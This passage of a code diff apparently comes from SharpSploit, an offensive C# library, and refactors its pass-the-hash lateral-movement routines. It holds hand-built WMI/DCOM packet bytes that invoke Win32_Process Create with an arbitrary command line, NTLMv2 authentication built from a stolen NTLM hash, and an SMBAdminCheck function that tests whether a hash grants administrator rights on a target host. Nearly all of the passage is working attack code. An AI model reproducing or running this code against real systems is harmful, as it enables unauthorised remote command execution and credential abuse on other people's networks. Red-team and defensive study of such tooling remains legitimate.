0x04, 0x00, 0x00, 0x00, 0x00, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x49, 0x6e, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x4c, 0x03, 0x00, 0x00, 0x00, 0x57, 0x4d, 0x49, 0x7c, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xf5, 0x03, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0xad, 0x03, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3a, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70 });
-                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[501]);
-                                                        stub_data = Utilities.CombineByteArray(stub_data, command_length);
-                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01 });
-                                                        stub_data = Utilities.CombineByteArray(stub_data, command_length2);
-                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00 });
-                                                        stub_data = Utilities.CombineByteArray(stub_data, command_bytes);
-                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+
+                                                        Console.WriteLine("big stub");
+                                                        stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                            .Concat(causality_ID_bytes)
+                                                            .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x06, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x63, 0x00, 0x72, 0x00, 0x65, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 })
+                                                            .Concat(stub_length)
+                                                            .Concat(new byte[] { 0x00, 0x00})
+                                                            .Concat(stub_length)
+                                                            .Concat(new byte[] { 0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x04, 0x00, 0x00, 0x00, 0x81, 0xa6, 0x12, 0xdc, 0x7f, 0x73, 0xcf, 0x11, 0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x12, 0xf8, 0x90, 0x45, 0x3a, 0x1d, 0xd0, 0x11, 0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x00, 0x00, 0x00, 0x00 })
+                                                            .Concat(stub_length2)
+                                                            .Concat(new byte[] { 0x00, 0x00, 0x78, 0x56, 0x34, 0x12 })
+                                                            .Concat(stub_length3)
+                                                            .Concat(new byte[] { 0x00, 0x00, 0x02, 0x53, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x03, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, 0x00, 0x15, 0x01, 0x00, 0x00, 0x73, 0x01, 0x00, 0x00, 0x76, 0x02, 0x00, 0x00, 0xd4, 0x02, 0x00, 0x00, 0xb1, 0x03, 0x00, 0x00, 0x15, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x12, 0x04, 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00, 0x61, 0x62, 0x73, 0x74, 0x72, 0x61, 0x63, 0x74, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x59, 0x01, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0xe2, 0x01, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x72, 0x02, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x49, 0x6e, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x4c, 0x03, 0x00, 0x00, 0x00, 0x57, 0x4d, 0x49, 0x7c, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xf5, 0x03, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0xad, 0x03, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3a, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70 })
+                                                            .Concat(new byte[501])
+                                                            .Concat(command_length)
+                                                            .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01 })
+                                                            .Concat(command_length2)
+                                                            .Concat(new byte[] { 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00 })
+                                                            .Concat(command_bytes)
+                                                            .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
+    
                                                         if (stub_data.Length < request_split_index)
                                                         {
                                                             request_flags = new byte[] { 0x83 };
@@ -879,15 +899,16 @@ namespace SharpSploit.LateralMovement
 
                                         packet_NTLMSSP_verifier = WMIExec.NTLMSSPVerifier(request_auth_padding, new byte[] { 0x04 }, sequence_number);
                                         NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
-                                        RPC_Sign = Utilities.CombineByteArray(sequence_number, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
-                                        RPC_Sign = Utilities.CombineByteArray(RPC_Sign, stub_data);
-                                        RPC_Sign = Utilities.CombineByteArray(RPC_Sign, Utilities.GetByteRange(NTLMSSP_verifier, 0, request_auth_padding + 7));
+                                        RPC_Sign = sequence_number.Concat(Utilities.ConvertFromPacketOrderedDictionary(packet_RPC))
+                                            .Concat(stub_data)
+                                            .Concat(Utilities.GetByteRange(NTLMSSP_verifier, 0, request_auth_padding + 7)).ToArray();
+
                                         RPC_signature = HMAC_MD5.ComputeHash(RPC_Sign);
                                         RPC_signature = Utilities.GetByteRange(RPC_signature, 0, 7);
                                         packet_NTLMSSP_verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_signature;
                                         NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
-                                        WMI_client_send = Utilities.CombineByteArray(Utilities.ConvertFromPacketOrderedDictionary(packet_RPC), stub_data);
-                                        WMI_client_send = Utilities.CombineByteArray(WMI_client_send, NTLMSSP_verifier);
+
+                                        WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC).Concat(stub_data).Concat(NTLMSSP_verifier).ToArray();
                                         WMI_client_random_port_stream.Write(WMI_client_send, 0, WMI_client_send.Length);
                                         WMI_client_random_port_stream.Flush();
 
@@ -942,6 +963,20 @@ namespace SharpSploit.LateralMovement
             return output.ToString();
         }
 
+
+        /// <summary>
+        /// Determines if a username and hash has administrative privilege on a target
+        /// </summary>
+        /// <param name="username">The Username to query.</param>
+        /// <param name="hash">The NTLM hash for the user</param>
+        /// <param name="domain">The logon domain for the user</param>
+        /// <param name="target">The target to query.</param>
+        /// <returns>True for Admin, False for not.</returns>
+        /// <author>Scottie Austin (@checkymander)</author>
+        /// <remarks>
+        /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+        /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
+        /// </remarks>
         public static bool SMBAdminCheck(string username, string hash, string domain, string target)
         {
             string result = SMBExecute(username, hash, domain, target, AdminCheck: true);
@@ -1101,10 +1136,7 @@ namespace SharpSploit.LateralMovement
                                 byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
                                 OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
                                 byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                SMB_client_send = new byte[NetBIOS_session_service.Length + SMB_header.Length + SMB_data.Length];
-                                Buffer.BlockCopy(NetBIOS_session_service, 0, SMB_client_send, 0, NetBIOS_session_service.Length);
-                                Buffer.BlockCopy(SMB_header, 0, SMB_client_send, NetBIOS_session_service.Length, SMB_header.Length);
-                                Buffer.BlockCopy(SMB_data, 0, SMB_client_send, NetBIOS_session_service.Length + SMB_header.Length, SMB_data.Length);
+                                SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
                                 SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                 if (BitConverter.ToString(new byte[] { SMBClientReceive[4], SMBClientReceive[5], SMBClientReceive[6], SMBClientReceive[7] }).ToLower() == "ff-53-4d-42")
                                 {
@@ -1146,7 +1178,6 @@ namespace SharpSploit.LateralMovement
                                         SMB_signing = false;
                                         SMB_session_key_length = new byte[] { 0x00, 0x00 };
                                         SMB_negotiate_flags = new byte[] { 0x05, 0x80, 0x08, 0xa0 };
-
                                     }
                                 }
                             }
@@ -1163,8 +1194,7 @@ namespace SharpSploit.LateralMovement
                                 byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
                                 OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
                                 byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
                                 SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                 SMBClientStage = "NTLMSSPNegotiate";
 
@@ -1188,8 +1218,7 @@ namespace SharpSploit.LateralMovement
                                     byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
                                     OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
                                     byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                    SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                    SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                    SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
                                 }
                                 else
                                 {
@@ -1203,9 +1232,7 @@ namespace SharpSploit.LateralMovement
                                     byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
                                     OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
                                     byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                    SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                    SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
-
+                                    SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
                                 }
                                 SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                 SMBClientStage = "exit";
@@ -1249,8 +1276,7 @@ namespace SharpSploit.LateralMovement
                 HMAC_MD5.Key = NTLM_hash_bytes;
                 string username_and_target = username.ToUpper();
                 byte[] username_bytes = Encoding.Unicode.GetBytes(username_and_target);
-                byte[] username_and_target_bytes = null;
-                username_and_target_bytes = Utilities.CombineByteArray(username_bytes, auth_domain_bytes);
+                byte[] username_and_target_bytes = username_bytes.Concat(auth_domain_bytes).ToArray();
                 byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(username_and_target_bytes);
                 Random r = new Random();
                 byte[] client_challenge_bytes = new byte[8];
@@ -1258,14 +1284,13 @@ namespace SharpSploit.LateralMovement
 
 
 
-                byte[] security_blob_bytes = null;
-                security_blob_bytes = Utilities.CombineByteArray(new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, SMB_target_time_bytes);
-                security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, client_challenge_bytes);
-                security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
-                security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, SMB_target_details);
-                security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
-
-                byte[] server_challenge_and_security_blob_bytes = Utilities.CombineByteArray(SMB_NTLM_challenge, security_blob_bytes);
+                byte[] security_blob_bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                    .Concat(SMB_target_time_bytes)
+                    .Concat(client_challenge_bytes)
+                    .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
+                    .Concat(SMB_target_details)
+                    .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                byte[] server_challenge_and_security_blob_bytes = server_challenge_and_security_blob_bytes = SMB_NTLM_challenge.Concat(security_blob_bytes).ToArray();
                 HMAC_MD5.Key = NTLMv2_hash;
                 byte[] NTLMv2_response = HMAC_MD5.ComputeHash(server_challenge_and_security_blob_bytes);
                 if (SMB_signing)
@@ -1275,36 +1300,34 @@ namespace SharpSploit.LateralMovement
                     HMACSHA256 HMAC_SHA256 = new HMACSHA256();
                     HMAC_SHA256.Key = session_key;
                 }
-
-                NTLMv2_response = Utilities.CombineByteArray(NTLMv2_response, security_blob_bytes);
+                NTLMv2_response = NTLMv2_response.Concat(security_blob_bytes).ToArray();
                 byte[] NTLMv2_response_length = BitConverter.GetBytes(NTLMv2_response.Length);
                 NTLMv2_response_length = new byte[] { NTLMv2_response_length[0], NTLMv2_response_length[1] };
                 byte[] SMB_session_key_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + NTLMv2_response.Length + 88);
-                byte[] NTLMSSP_response = null;
-                NTLMSSP_response = Utilities.CombineByteArray(new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 }, auth_LM_offset);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_NTLM_offset);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_offset);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_offset);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
